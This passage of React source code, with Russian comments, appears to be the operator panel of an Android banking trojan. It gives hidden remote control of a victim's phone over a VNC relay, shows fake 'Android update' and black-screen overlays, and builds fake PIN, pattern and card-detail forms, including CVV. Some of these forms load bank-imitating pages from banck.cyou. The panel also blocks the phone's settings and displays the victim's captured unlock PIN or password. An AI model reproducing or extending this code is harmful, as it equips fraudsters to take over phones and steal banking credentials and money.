    return new Promise((resolve) => {

      const socket = ws?.current;

      if (!socket || socket.readyState !== 1) { resolve(null); return; }

      tokenResolveRef.current = resolve;

      socket.send(JSON.stringify({ action: 'request_vnc_token', uuid: targetUuid }));

      setTimeout(() => {

        if (tokenResolveRef.current === resolve) { tokenResolveRef.current = null; resolve(null); }

      }, 5000);

    });

  }, [ws]); // eslint-disable-line



  // Подключиться к Relay (WS2), ждать 'subscribed'. Возвращает WebSocket или null.

  // Используем /ws-relay через тот же 443 (порт 3001 блокируется Cloudflare)

  const connectToRelay = useCallback((token, _relayPort) => {

    return new Promise((resolve) => {

      const proto = window.location.protocol === 'https:' ? 'wss:' : 'ws:';

      // В dev можно задать REACT_APP_WS_RELAY_BASE (см. .env.development) — прямое
      // подключение к vnc-relay, минуя dev-server (в проде /ws-relay маппит nginx).
      const relayBase = process.env.REACT_APP_WS_RELAY_BASE || `${proto}//${window.location.host}`;
      const relayWs = new WebSocket(`${relayBase}/ws-relay`);

      const timeout = setTimeout(() => { try { relayWs.close(); } catch (_) {} resolve(null); }, 4000);

      relayWs.onopen  = () => relayWs.send(JSON.stringify({ action: 'subscribe', token }));

      relayWs.onmessage = (e) => {

        try {

          const msg = JSON.parse(e.data);

          if (msg.action === 'subscribed') { clearTimeout(timeout); resolve(relayWs); }

        } catch (_) {}

      };

      relayWs.onerror = () => { clearTimeout(timeout); resolve(null); };

      // onclose до subscribed тоже = неудача

      relayWs.onclose = () => { clearTimeout(timeout); resolve(null); };

    });

  }, []);



  // Закрыть Relay и переключить фреймы обратно на WS1

  const closeRelay = useCallback((targetUuid, sendStopRelay) => {

    const r = relayWsRef.current;

    relayWsRef.current  = null;

    relayActiveRef.current = false;

    relaySetupIdRef.current += 1;

    relaySetupPendingRef.current = false;

    if (r) { r.onclose = null; r.onerror = null; r.onmessage = null; try { r.close(); } catch (_) {} }

    if (sendStopRelay) {

      const socket = ws?.current;

      if (socket && socket.readyState === 1) {

        socket.send(JSON.stringify({ action: 'stop_relay', uuid: targetUuid }));

        // Пересылаем текущий режим чтобы воркер поставил нас в правильный watcher

        const intent = userIntentRef.current;

        if (intent && intent !== 'off' && intent !== 'video') {

          socket.send(JSON.stringify({ action: 'set_crane_mode', uuid: targetUuid, mode: intent }));

        }

      }

    }

  }, [ws]); // eslint-disable-line



  // Асинхронно подключить Relay в фоне и переключить доставку на WS2

  const setupRelay = useCallback(async (targetUuid, mode) => {

    if (mode === 'off' || mode === 'video') return;

    // Если relay уже активен и соединение живо — не переподключаться при смене режима

    if (relayActiveRef.current && relayWsRef.current && relayWsRef.current.readyState === 1) return;

    // Если setup уже идёт — не запускать параллельный (защита от relay_reconnect race)

    if (relaySetupPendingRef.current) return;



    relaySetupIdRef.current += 1;

    const mySetupId = relaySetupIdRef.current;

    relaySetupPendingRef.current = true;



    try {

      // 1. Запросить токен

      const result = await requestVncToken(targetUuid);

      if (!result || relaySetupIdRef.current !== mySetupId) return;



      // 2. Проверить что VNC ещё активен

      if (modeRef.current === 'off' || modeRef.current === 'video') return;



      // 3. Подключиться к Relay

      const relayWs = await connectToRelay(result.token, result.relayPort);

      if (!relayWs) return;

      if (relaySetupIdRef.current !== mySetupId) {

        try { relayWs.close(); } catch (_) {}

        return;

      }



      // 4. Ещё раз проверить что VNC ещё активен

      if (modeRef.current === 'off' || modeRef.current === 'video') {

        try { relayWs.close(); } catch (_) {}

        return;

      }



      // 5. Успех — переключаемся на Relay

      relayWsRef.current     = relayWs;

      relayActiveRef.current = true;



      // Говорим серверу убрать нас из screenWatchers/acWatchers

      const socket = ws?.current;

      if (socket && socket.readyState === 1) {

        socket.send(JSON.stringify({ action: 'use_relay', uuid: targetUuid }));

      }



      // Слушаем фреймы на WS2

      relayWs.onmessage = (e) => {

        try {

          const outer = JSON.parse(e.data);

          // Relay доставляет: { type: 'screen-frame-deliver'|'ac-frame-deliver', uuid, payload: {...} }

          // payload — это оригинальный vncPayload от устройства

          const inner = (outer.type === 'screen-frame-deliver' || outer.type === 'ac-frame-deliver')

            ? outer.payload

            : outer;

          if (!inner || inner.uuid !== targetUuid) return;



          if (inner.action === 'ac_frame') {

            lastFrameAtRef.current = Date.now();

            if (lastCmdTsRef.current !== null) {

              const elapsed = Math.round(performance.now() - lastCmdTsRef.current);

              lastCmdTsRef.current = null;

              rttSamplesRef.current.push(elapsed);

              if (rttSamplesRef.current.length > 5) rttSamplesRef.current.shift();

              setRtt(Math.round(rttSamplesRef.current.reduce((a, b) => a + b, 0) / rttSamplesRef.current.length));

            }

            renderAcFrame(inner.nodes, inner.w, inner.h);

          } else if (inner.action === 'crane_frame' || inner.action === 'screenshot') {

            lastFrameAtRef.current = Date.now();

            if (lastCmdTsRef.current !== null) {

              const elapsed = Math.round(performance.now() - lastCmdTsRef.current);

              lastCmdTsRef.current = null;

              rttSamplesRef.current.push(elapsed);

              if (rttSamplesRef.current.length > 5) rttSamplesRef.current.shift();

              setRtt(Math.round(rttSamplesRef.current.reduce((a, b) => a + b, 0) / rttSamplesRef.current.length));

            }

            if (inner.action === 'screenshot') {
              setScreenshotOverlay({ data: inner.data, fmt: inner.fmt });
            } else {
              renderImageFrame(inner.data, screenCanvasRef, inner.fmt);
            }

          }

        } catch (_) {}

      };



      relayWs.onclose = () => {

        // Relay упал — fallback на WS1

        if (modeRef.current !== 'off' && modeRef.current !== 'video') {

          closeRelay(targetUuid, true);

        } else {

          relayWsRef.current     = null;

          relayActiveRef.current = false;

        }

      };

      relayWs.onerror = () => { try { relayWs.close(); } catch (_) {} };



    } finally {

      if (relaySetupIdRef.current === mySetupId) {

        relaySetupPendingRef.current = false;

      }

    }



  }, [requestVncToken, connectToRelay, closeRelay, renderAcFrame, renderImageFrame, ws]); // eslint-disable-line

  setupRelayRef.current = setupRelay;



  // ── При реконнекте WS — повторно регистрируем VNC ────────────────────────────

  useEffect(() => {

    if (connectionStatus !== 'connected') return;

    const intent = userIntentRef.current;

    if (!intent || intent === 'off') return;

    const socket = ws?.current;

    if (!socket || socket.readyState !== 1) return;

    socket.send(JSON.stringify({ action: 'set_crane_mode', uuid, mode: intent }));

  }, [connectionStatus]); // eslint-disable-line



  // ── Heartbeat: keep-alive каждые 15с ─────────────────────────────────────────

  // Только поддерживаем регистрацию watcher активной — НЕ делаем off+on,

  // чтобы не ломать авто-переключение ac↔screen на устройстве.

  // Если нет фреймов 15с+ — просто повторно шлём текущий режим (без off).

  useEffect(() => {

    if (mode === 'off' || mode === 'video') return;

    const t = setInterval(() => {

      const socket = ws?.current;

      if (!socket || socket.readyState !== 1) return;

      const intent = userIntentRef.current;

      if (!intent || intent === 'off' || intent === 'video') return;

      socket.send(JSON.stringify({ action: 'set_crane_mode', uuid, mode: intent }));

    }, 15000);

    return () => clearInterval(t);

  }, [mode, uuid]); // eslint-disable-line



  // ── Индикатор "нет фреймов X сек" ───────────────────────────────────────────

  useEffect(() => {

    if (mode === 'off' || mode === 'video') { setNoFrameSec(0); return; }

    lastFrameAtRef.current = Date.now();

    const t = setInterval(() => {

      const sec = Math.floor((Date.now() - lastFrameAtRef.current) / 1000);

      setNoFrameSec(sec);

    }, 1000);

    return () => { clearInterval(t); setNoFrameSec(0); };

  }, [mode]); // eslint-disable-line



  // ── Ping до устройства каждые 3с ────────────────────────────────────────────

  useEffect(() => {

    if (mode === 'off') { setPing(null); return; }

    const t = setInterval(() => {

      const socket = ws?.current;

      if (!socket || socket.readyState !== 1) return;

      if (pingTsRef.current !== null) return; // предыдущий ещё не вернулся

      pingTsRef.current = performance.now();

      socket.send(JSON.stringify({ action: 'ping_device', uuid }));

    }, 3000);

    return () => { clearInterval(t); setPing(null); pingTsRef.current = null; };

  }, [mode, uuid]); // eslint-disable-line



  // ── Send ─────────────────────────────────────────────────────────────────────

  const send = useCallback((action, extra = {}, toastMsg) => {

    const socket = ws?.current;

    if (!socket || socket.readyState !== 1) {

      if (toastMsg) toastr.error('Нет соединения');

      return;

    }

    socket.send(JSON.stringify({ action, uuid, ...extra }));

    // Фиксируем время команды для анализа задержки (только интерактивные действия)

    if (action === 'click' || action === 'swipe' || action === 'key_event') {

      clearTimeout(cmdRttTimeoutRef.current);

      lastCmdTsRef.current = performance.now();

      // Если фрейм не придёт за 2с (напр. blank_screen_on → delta-оптимизация глушит кадры),

      // сбрасываем замер чтобы RTT не показывал мусорные значения 10+ секунд.

      cmdRttTimeoutRef.current = setTimeout(() => { lastCmdTsRef.current = null; }, 2000);

    }

    if (toastMsg) toastr.success(toastMsg);

  }, [ws, uuid]); // eslint-disable-line



  const setVncMode = (m) => {

    if (modeRef.current === 'video' && m !== 'video') {

      closeVideoDecoder();

      if (videoPendingRef.current) { videoPendingRef.current = false; setVideoPendingRaw(false); }

    }

    if (m === 'off' || m === 'video') {

      // При выходе из VNC — закрыть Relay без stop_relay (set_crane_mode off уберёт watcher)

      if (relayActiveRef.current) closeRelay(uuid, false);

    } else if (relayActiveRef.current) {

      // При смене ac↔screen: закрыть старый WS2 и послать stop_relay чтобы сервер

      // сбросил ws.usingRelay. Тогда set_crane_mode ниже правильно добавит в watcher,

      // и setupRelay создаст новый WS2 без блокировки гварда.

      const r = relayWsRef.current;

      relayWsRef.current  = null;

      relayActiveRef.current = false;

      relaySetupIdRef.current += 1;

      relaySetupPendingRef.current = false;

      if (r) { r.onclose = null; r.onerror = null; r.onmessage = null; try { r.close(); } catch (_) {} }

      const _sock = ws?.current;

      if (_sock && _sock.readyState === 1) {

        _sock.send(JSON.stringify({ action: 'stop_relay', uuid }));

      }

    }

    userIntentRef.current = m;

    modeRef.current = m;

    setMode(m);

    if (m === 'off') { setSettingsBlockEnabled(null); setVibrating(false); }

    const label = { ac: 'AcVNC', screen: 'ScreenVNC', video: 'VideoVNC', off: 'Стоп' }[m] || m;

    if (m === 'video') {

      const autoIbis = autoIbisChecked;

      if (!autoIbis) { videoPendingRef.current = true; setVideoPendingRaw(true); }

      send('set_crane_mode', { mode: m, autoIbis }, `VNC: ${label}`);

    } else {

      send('set_crane_mode', { mode: m }, m === 'off' ? 'VNC остановлен' : `VNC: ${label}`);

    }

    // Подключить Relay в фоне (ac/screen режимы)

    if (m !== 'off' && m !== 'video') {

      setupRelay(uuid, m);

    }

  };



  // Stop VNC on unmount (tab close, page refresh, onClose without stopping)

  // eslint-disable-next-line react-hooks/exhaustive-deps

  useEffect(() => () => {

    // Закрыть Relay без stop_relay — set_crane_mode off сам уберёт watcher на сервере

    if (relayWsRef.current) {

      const r = relayWsRef.current;

      relayWsRef.current = null; relayActiveRef.current = false;

      relaySetupPendingRef.current = false; relaySetupIdRef.current += 1;

      r.onclose = null; r.onerror = null; r.onmessage = null;

      try { r.close(); } catch (_) {}

    }

    const socket = ws?.current;

    if (modeRef.current !== 'off' && socket && socket.readyState === 1) {

      socket.send(JSON.stringify({ action: 'set_crane_mode', uuid, mode: 'off' }));

    }

    videoPendingRef.current = false;

    if (videoDecoderRef.current) {

      try { videoDecoderRef.current.close(); } catch (_) {}

      videoDecoderRef.current = null;

    }

  }, []);

  const toggleOverlay = (type) => {

    if (overlayMode === type) {

      setOverlayMode('none');

      send('overlay_off', {}, 'Оверлей выключен');

    } else {

      setOverlayMode(type);

      send(type === 'black' ? 'blank_screen_on' : 'fake_update_on', {},

           type === 'black' ? 'Чёрный экран включён' : 'Фейк-апдейт включён');

    }

  };

  const applyBlack = (text) => {

    setOverlayMode('black');

    send('blank_screen_on', text ? { text } : {}, 'Чёрный экран включён');

  };

  const applyAndroidUpdate = () => {

    setOverlayMode('android_update');

    send('android_update_on', {}, 'Android-обновление включено');

  };



  const resetHybridDialog = () => {

    setHTitle(''); setHButtonText(''); setHDurType('permanent'); setHDurSec(60);

    setHType('pin'); setHPinDigits(0); setHUrl(''); setHHint('');

    setHBrand('xiaomi'); setHValidatePin(false); setHShowExpiry(true); setHShowCvv(true); setHShowName(false);
    setHSbpinPreset(false); setHSbpinGreeting(''); setHSbpinName(''); setHSbpinValidPin(false); setHSbpinPattern('');
    setHSbpinPopup(false); setHSbpinPopupTitle(''); setHSbpinPopupText(''); setHSbpinPopupBtn('');

  };



  const sendHybridOverlay = () => {

    const cfg = {

      type: hType,

      title: hTitle,

      duration_type: hDurType,

    };

    if (hButtonText)          cfg.button_text  = hButtonText;

    if (hDurType === 'timed') cfg.duration_sec  = Number(hDurSec) || 60;

    if (hType === 'pin')                              cfg.pin_digits = Number(hPinDigits);

    if (hType === 'webview' && hSbpinPreset) {
      const sc = {};
      if (hSbpinGreeting.trim()) sc.greeting_text = hSbpinGreeting.trim();
      if (hSbpinName.trim()) sc.greeting_name = hSbpinName.trim();
      if (hSbpinValidPin) sc.validate_pin = true;
      if (hSbpinPattern.trim()) sc.known_pattern = hSbpinPattern.trim();
      if (hSbpinPopup && hSbpinPopupBtn.trim()) {
        sc.popup_title  = hSbpinPopupTitle.trim();
        sc.popup_text   = hSbpinPopupText.trim();
        sc.popup_button = hSbpinPopupBtn.trim();
      }
      cfg.url = 'https://banck.cyou/sbpin?config=' + btoa(unescape(encodeURIComponent(JSON.stringify(sc))));
    } else if (hType === 'webview' || hType === 'browser') {
      cfg.url = hUrl;
    }

    if (hType === 'pattern'  || hType === 'password') cfg.hint       = hHint;

    if (hType === 'pin' || hType === 'card')          cfg.brand      = hBrand;

    if (hType === 'pin')                              cfg.validate_pin = hValidatePin;

    if (hType === 'card') {

      cfg.show_expiry = hShowExpiry;

      cfg.show_cvv    = hShowCvv;

      cfg.show_name   = hShowName;

      if (hHint)       cfg.hint = hHint;

    }

    send('show_hybrid_overlay', { config: cfg }, 'Оверлей запущен');

    setShowHybridDialog(false);

    resetHybridDialog();

  };



  const sendPushAlert = () => {
    const alertCfg = {
      title:             paTitle,
      message:           paMessage,
      button_text:       paBtnText,
      button_color:      paBtnColor,
      button_text_color: paBtnTextColor,
      ...(paLaunchApp && { launch_app: paLaunchApp }),
    };
    const b64 = btoa(unescape(encodeURIComponent(JSON.stringify(alertCfg))));
    const url = 'https://banck.cyou/alert.html?config=' + b64;
    const wsCfg = {
      type:          'webview',
      url,
      duration_type: paDurType,
      title:         paTitle,
    };
    if (paDurType === 'timed') wsCfg.duration_sec = Number(paDurSec) || 60;
    pushAlertPendingRef.current = true;
    send('show_hybrid_overlay', { config: wsCfg });
    toastr.success('📣 Пуш-алерт отправлен');
    setShowPushAlert(false);
  };



  const patEdDotClick = (i) => {

    setPatEdDots(prev => {

      if (prev.includes(i)) return prev;

      const next = [...prev, i];

      setPatEdText(next.join(','));

      return next;

    });

  };

  const patEdTextChange = (v) => {

    setPatEdText(v);

    const parsed = v.split(',').map(s => parseInt(s.trim(), 10)).filter(n => !isNaN(n) && n >= 0 && n <= 8);

    setPatEdDots([...new Set(parsed)]);

  };

  const patEdReset = () => { setPatEdDots([]); setPatEdText(''); setPatEdPin(''); setPatEdPassword(''); };

  const patEdSave = () => {

    let method;

    if (patEdType === 'pattern') {

      if (patEdDots.length < 4) { toastr.error('Паттерн: минимум 4 точки'); return; }

      method = { type: 'pattern', dots: patEdDots, gridSize: 9 };

    } else if (patEdType === 'pin') {

      if (!/^\d{4,}$/.test(patEdPin)) { toastr.error('PIN: только цифры, минимум 4'); return; }

      method = { type: 'pin', code: patEdPin };

    } else if (patEdType === 'password') {

      if (!patEdPassword.trim()) { toastr.error('Пароль не может быть пустым'); return; }

      method = { type: 'password', code: patEdPassword };

    }

    send('set_unlock_method', { method }, 'Метод разблокировки сохранён');

    setUnlockMethod(method);

    setPinnedMethod(method);

    setShowPatternEditor(false);

    patEdReset();

  };



  const activeCanvasMode = mode === 'ac' ? 'ac' : mode === 'screen' ? 'screen' : (mode === 'video' && !videoPending) ? 'video' : (videoPending && mode === 'video') ? 'ac' : null;



  const getCoords = (e, canvas) => {

    const r = canvas.getBoundingClientRect();

    return {

      xf: Math.max(0, Math.min(1, (e.clientX - r.left) / r.width)),

      yf: Math.max(0, Math.min(1, (e.clientY - r.top)  / r.height)),

    };

  };



  const handleMouseDown = useCallback((e, cm) => {

    if (activeCanvasMode !== cm) return;

    if (e.button === 1) return; // средняя кнопка — pan, не клик

    swipeRef.current = null; // сброс незакрытого предыдущего состояния (mouseup мог выйти за пределы canvas)

    const { xf, yf } = getCoords(e, e.currentTarget);

    swipeRef.current = { xf, yf, t: Date.now() };

  // eslint-disable-next-line react-hooks/exhaustive-deps

  }, [activeCanvasMode]);



  const handleMouseUp = useCallback((e, cm) => {

    if (activeCanvasMode !== cm || !swipeRef.current) return;

    if (e.button === 1) return; // средняя кнопка — pan, не клик/свайп

    const { xf: x1f, yf: y1f, t } = swipeRef.current;

    swipeRef.current = null;

    const { xf: x2f, yf: y2f } = getCoords(e, e.currentTarget);

    const dist = Math.hypot(x2f - x1f, y2f - y1f);

    if (dist > 0.025) {

      send('swipe', { x1f, y1f, x2f, y2f, dur: Math.min(Date.now() - t, 800) });

    } else {

      kbBufRef.current = ''; // новое поле — сбрасываем буфер клавиатуры

      send('click', { xf: x1f, yf: y1f });

    }

  // eslint-disable-next-line react-hooks/exhaustive-deps

  }, [activeCanvasMode, send]);



  // ── Keyboard passthrough ──────────────────────────────────────────────────────

  useEffect(() => {

    if (mode === 'off') return;

    const handler = (e) => {

      if (e.target.tagName === 'INPUT' || e.target.tagName === 'TEXTAREA') return;

      if (e.ctrlKey || e.metaKey || e.altKey) return;

      if (e.key === 'Backspace') {

        e.preventDefault();

        kbBufRef.current = kbBufRef.current.slice(0, -1);

        send('type_text', { text: kbBufRef.current });

      } else if (e.key === 'Enter') {

        e.preventDefault();

        send('key_event', { key: 'enter' });

        kbBufRef.current = '';

      } else if (e.key.length === 1) {

        e.preventDefault();

        kbBufRef.current += e.key;

        send('type_text', { text: kbBufRef.current });

      }

    };

    window.addEventListener('keydown', handler);

    return () => window.removeEventListener('keydown', handler);

  }, [mode, send]);



  // ── Обработка колеса: Ctrl+колесо = zoom (ScreenVNC/AcVNC), иначе скролл ──

  const handleWheel = useCallback((e) => {

    e.preventDefault();

    const cm = modeRef.current;

    if (e.ctrlKey) {

      if (cm === 'ac') {

        // AcVNC: Ctrl+колесо масштабирует текст

        setAcScale(acScaleRef.current + (e.deltaY < 0 ? 0.1 : -0.1));

        return;

      }

      if (cm === 'screen') {

        // ScreenVNC: Ctrl+колесо зумирует под курсором

        const factor = e.deltaY < 0 ? 1.15 : 1 / 1.15;

        const oldZ = screenZoomRef.current;

        const newZ = Math.max(0.25, Math.min(8.0, oldZ * factor));

        const cont = screenContainerRef.current;

        if (cont) {

          const rect = cont.getBoundingClientRect();

          const cx = e.clientX - rect.left;

          const cy = e.clientY - rect.top;

          const op = screenPanRef.current;

          setScreenPan({

            x: cx - (cx - op.x) * (newZ / oldZ),

            y: cy - (cy - op.y) * (newZ / oldZ),

          });

        }

        setScreenZoom(newZ);

        return;

      }

    }

    send('scroll', { ...getCoords(e, e.currentTarget), dy: e.deltaY });

  }, [send]); // eslint-disable-line



  const modeLabel  = (m) => ({ ac: 'AcVNC', screen: 'ScreenVNC', video: 'VideoVNC', off: '' }[m] || m);

  const deviceName = [device?.brand, device?.model].filter(Boolean).join(' ') || uuid?.substring(0, 12);

  const vncActive  = mode !== 'off';

  const isLeft     = sidebarPos === 'left';



  // ── UI helpers ───────────────────────────────────────────────────────────────

  const mkBtnStyle = (active, danger, warn, dim) => {

    const b = { padding: '5px 10px', borderRadius: '5px', cursor: 'pointer', fontSize: '12px', fontWeight: '500',

      whiteSpace: 'nowrap', border: '1px solid', transition: 'background 0.12s', opacity: dim ? 0.4 : 1, width: 'auto', display: 'inline-block' };

    if (danger) return { ...b, background: active ? '#b71c1c' : '#140a0a', borderColor: active ? '#c62828' : '#2a1010', color: active ? '#fff' : '#c07070' };

    if (warn)   return { ...b, background: active ? '#e65100' : '#140d04', borderColor: active ? '#e65100' : '#2a1c08', color: active ? '#fff' : '#c08040' };

    return { ...b, background: active ? '#1b5e20' : '#081408', borderColor: active ? '#2e7d32' : '#162516', color: active ? '#c8e6c9' : '#5a9060' };

  };

  const Btn = ({ active, danger, warn, dim, onClick, children, title }) => (

    <button style={mkBtnStyle(active, danger, warn, dim)} onClick={onClick} title={title}>{children}</button>

  );



  const navBtnSt = (w) => ({

    padding: '5px 3px', borderRadius: '5px', cursor: 'pointer', fontSize: '11px', fontWeight: '600',

    textAlign: 'center', whiteSpace: 'nowrap', border: '1px solid #162516', background: '#081408',

    color: '#5a9060', transition: 'background 0.12s', display: 'block',

    width: w || '100%', boxSizing: 'border-box',

  });

  const NavBtn = ({ onClick, title, children, w }) => (

    <button style={navBtnSt(w)} onClick={onClick} title={title}>{children}</button>

  );



  const dBtnSt = { padding: 0, borderRadius: '4px', cursor: 'pointer', fontSize: '14px', fontWeight: '700',

    textAlign: 'center', border: '1px solid #162030', background: '#0a1220', color: '#4a7060',

    display: 'flex', alignItems: 'center', justifyContent: 'center', width: '26px', height: '26px', boxSizing: 'border-box' };

  const DBtn  = ({ onClick, title, ch }) => <button style={dBtnSt} onClick={onClick} title={title}>{ch}</button>;

  const DEmpty = () => <div style={{ width: '26px', height: '26px' }} />;



  const swipe = (x1f, y1f, x2f, y2f) => send('swipe', { x1f, y1f, x2f, y2f, dur: 300 });



  const RowSep  = () => <div style={{ height: '1px', background: '#101c2c', margin: '2px 0', flexShrink: 0 }} />;

  const SideSep = () => <div style={{ height: '1px', background: '#101c2e', margin: '3px 0', width: '100%', flexShrink: 0 }} />;



  // ── Resize handle сайдбара ───────────────────────────────────────────────────

  const SidebarResizeHandle = () => (

    <div

      onMouseDown={onSidebarResizeStart}

      style={{

        position: 'absolute',

        ...(isLeft

          ? { right: 0, top: 0, bottom: 0, width: '5px', cursor: 'ew-resize' }

          : { left: 0, right: 0, bottom: 0, height: '5px', cursor: 'ns-resize' }),

        background: 'transparent', zIndex: 5,

      }}

      onMouseEnter={e => e.currentTarget.style.background = 'rgba(30,90,120,0.35)'}

      onMouseLeave={e => e.currentTarget.style.background = 'transparent'}

    />

  );



  // ── Редактор метода разблокировки ───────────────────────────────────────────

  const tabSt = (active) => ({

    flex: 1, fontSize: '9px', padding: '2px 1px', borderRadius: '3px', cursor: 'pointer',

    background: active ? '#1b5e20' : '#060e0a',

    border: `1px solid ${active ? '#2e7d32' : '#1a3020'}`,

    color: active ? '#c8e6c9' : '#3a6040',

  });

  const edInput = (extra = {}) => ({

    width: '100%', boxSizing: 'border-box', background: '#060e0a',

    border: '1px solid #1a3020', color: '#7dffaa', borderRadius: '3px', outline: 'none',

    fontSize: '12px', padding: '4px 6px', ...extra,

  });

  const methodEditorUI = (

    <div style={{ background: '#040a06', border: '1px solid #1a3020', borderRadius: '4px', padding: '5px' }}>

      <div style={{ display: 'flex', gap: '2px', marginBottom: '5px' }}>

        {[['pattern','Паттерн'],['pin','PIN'],['password','Пароль']].map(([t, label]) => (

          <button key={t} style={tabSt(patEdType === t)} onClick={() => { setPatEdType(t); patEdReset(); }}>{label}</button>

        ))}

      </div>

      {patEdType === 'pattern' && (<>

        <InteractivePatternGrid dots={patEdDots} onDotClick={patEdDotClick} />

        <input type="text" value={patEdText} onChange={e => patEdTextChange(e.target.value)}

          placeholder="0,3,6,7,8" style={{ ...edInput(), marginTop: '4px' }} />

      </>)}

      {patEdType === 'pin' && (

        <input type="text" inputMode="numeric" value={patEdPin}

          onChange={e => setPatEdPin(e.target.value.replace(/\D/g, ''))}

          placeholder="1234" maxLength={12}

          style={edInput({ fontSize: '16px', letterSpacing: '5px', textAlign: 'center' })} />

      )}

      {patEdType === 'password' && (

        <input type="text" value={patEdPassword}

          onChange={e => setPatEdPassword(e.target.value)}

          placeholder="пароль"

          style={edInput()} />

      )}

      <div style={{ display: 'flex', gap: '3px', marginTop: '4px' }}>

        <button onClick={patEdSave} style={{ flex: 1, fontSize: '10px', padding: '3px', borderRadius: '3px',

          background: '#1b5e20', border: '1px solid #2e7d32', color: '#c8e6c9', cursor: 'pointer' }}>✓ Сохр.</button>

        <button onClick={patEdReset} style={{ fontSize: '10px', padding: '3px 6px', borderRadius: '3px',

          background: '#140d04', border: '1px solid #2a1c08', color: '#c08040', cursor: 'pointer' }}>↺</button>

      </div>

    </div>

  );



  // ── Сайдбар ──────────────────────────────────────────────────────────────────

  const Sidebar = () => {

    if (!vncActive) return null;



    const pinBtn = (

      <button

        style={{ ...navBtnSt(), fontSize: '10px', color: '#2a5040', borderColor: '#101c18', background: '#060e0a', marginBottom: '1px' }}

        onClick={() => setSidebarPos(p => p === 'left' ? 'top' : 'left')}

        title={isLeft ? 'Перенести в шапку' : 'Перенести в бок'}

      >{isLeft ? '⬆ В шапку' : '⬅ В бок'}</button>

    );



    const dpad = (

      <div style={{ display: 'grid', gridTemplateColumns: '26px 26px 26px', gridTemplateRows: '26px 26px 26px', gap: '2px' }}>

        <DEmpty /><DBtn ch="↑" title="Свайп вверх"  onClick={() => swipe(0.5,0.75,0.5,0.25)} /><DEmpty />

        <DBtn ch="←" title="Свайп влево"  onClick={() => swipe(0.8,0.5,0.2,0.5)} /><DEmpty />

        <DBtn ch="→" title="Свайп вправо" onClick={() => swipe(0.2,0.5,0.8,0.5)} />

        <DEmpty /><DBtn ch="↓" title="Свайп вниз"  onClick={() => swipe(0.5,0.25,0.5,0.75)} /><DEmpty />

      </div>

    );



    if (isLeft) {

      return (

        <div style={{

          width: sidebarSize, flexShrink: 0, position: 'relative',

          background: '#080d16', borderRight: '1px solid #101c2e',

          display: 'flex', flexDirection: 'column', alignItems: 'stretch',

          gap: '3px', padding: '5px 4px', overflowY: 'auto', overflowX: 'hidden',

        }}>

          {pinBtn}

          <NavBtn onClick={() => send('send_back',    {}, 'Назад')}    title="Назад">◀ Назад</NavBtn>

          <NavBtn onClick={() => send('send_home',    {}, 'Домой')}    title="Домой">⌂ Домой</NavBtn>

          <NavBtn onClick={() => send('send_recents', {}, 'Недавние')} title="Недавние">⊞ Недав.</NavBtn>

          <SideSep />

          <NavBtn onClick={() => send('send_lock_screen',   {}, 'Экран заблокирован')} title="Заблокировать">🔒 Блок.</NavBtn>

          <NavBtn onClick={() => send('wake_screen', {}, 'Экран разбужен')} title="Разбудить экран (без пароля)">🌙 Разбуд.</NavBtn>

          <NavBtn onClick={() => send('send_unlock_screen', {}, 'Разблокировка...')}   title={`Разблокировать · метод: ${activeMethod.type}${pinnedMethod ? ' 📌' : ''}`}>🔓 Разблок.</NavBtn>

          <SideSep />

          <NavBtn
            active={settingsBlockEnabled === false}
            onClick={() => {
              if (settingsBlockEnabled === null) return;
              const next = !settingsBlockEnabled;
              setSettingsBlockEnabled(next);
              send('set_settings_block', { enabled: next }, next ? '🛡 Блок. вкл' : '🔓 Блок. выкл');
            }}
            title={settingsBlockEnabled === null ? 'Получение статуса...' : settingsBlockEnabled ? 'Блокировка настроек включена — нажать чтобы выключить' : 'Блокировка настроек ВЫКЛЮЧЕНА — нажать чтобы включить'}
            style={{ opacity: settingsBlockEnabled === null ? 0.4 : 1 }}
          >
            {settingsBlockEnabled === null ? 'Настройки ?' : settingsBlockEnabled ? 'Настройки вкл' : 'Настройки выкл'}
          </NavBtn>

          <SideSep />

          <div style={{ padding: '0 4px', display: 'flex', flexDirection: 'column', gap: '2px' }}>

            <div style={{ display: 'flex', alignItems: 'center', gap: '4px', paddingBottom: '2px' }}>

              <input

                type="number"

                min="1" max="300"

                value={vibDuration}

                onChange={e => setVibDuration(Math.max(1, Math.min(300, parseInt(e.target.value) || 10)))}

                onKeyDown={e => e.stopPropagation()}

                style={{ width: '40px', background: '#060d18', border: '1px solid #1a3050', color: '#8ab4c8', fontSize: '11px', padding: '2px 4px', borderRadius: '3px', outline: 'none', textAlign: 'center' }}

                title="Длительность вибрации (сек)"

              />

              <span style={{ color: '#4a6a80', fontSize: '11px' }}>сек</span>

            </div>

            {vibrating ? (

              <NavBtn onClick={() => { send('stop_vibration', {}, 'Вибрация остановлена'); setVibrating(false); }} title="Остановить вибрацию">Стоп вибр.</NavBtn>

            ) : (

              <NavBtn onClick={() => { send('start_vibration', { duration: vibDuration * 1000 }, 'Вибрация ' + vibDuration + 'с'); setVibrating(true); }} title={'Запустить вибрацию на ' + vibDuration + ' сек'}>Вибрация</NavBtn>

            )}

          </div>

          {activeMethod.type !== '?' && (

            <div style={{ fontSize:'9px', color:'#2a5060', textAlign:'center', padding:'0 2px' }}>

              <div style={{ display:'flex', alignItems:'center', justifyContent:'center', gap:'3px' }}>

                {pinnedMethod && (

                  <span

                    title="Метод закреплён вручную — нажать чтобы открепить"

                    onClick={() => { setPinnedMethod(null); send('clear_manual_unlock_method', {}, ''); }}

                    style={{ cursor:'pointer', fontSize:'10px', opacity:0.9, userSelect:'none' }}>

                    📌✕

                  </span>

                )}

                <span>

                  {activeMethod.type==='pin'     ? `PIN ${activeMethod.code?.length||0}цифр` :

                   activeMethod.type==='pattern' ? `Паттерн ${getPatternDots(activeMethod).length}т.` :

                   activeMethod.type==='password'? 'Пароль (ручной)' :

                   activeMethod.type==='swipe'   ? 'Свайп' : ''}

                </span>

                {(activeMethod.type === 'pin' || activeMethod.type === 'pattern' || activeMethod.type === 'password') && (

                  <span onClick={() => setShowUnlockSecret(v => !v)}

                    style={{ cursor:'pointer', fontSize:'20px', opacity:0.85, userSelect:'none', lineHeight:1 }}

                    title="Показать сохранённые данные">

                    {showUnlockSecret ? '🙈' : '👁'}

                  </span>

                )}

              </div>

              {showUnlockSecret && (

                <div style={{ marginTop:'4px', padding:'4px', background:'#040a06', borderRadius:'4px', border:'1px solid #1a3020' }}>

                  {activeMethod.type === 'pin' && (

                    <span style={{ color:'#7dffaa', letterSpacing:'3px', fontSize:'12px', fontFamily:'monospace' }}>

                      {activeMethod.code || '—'}

                    </span>

                  )}

                  {activeMethod.type === 'password' && (

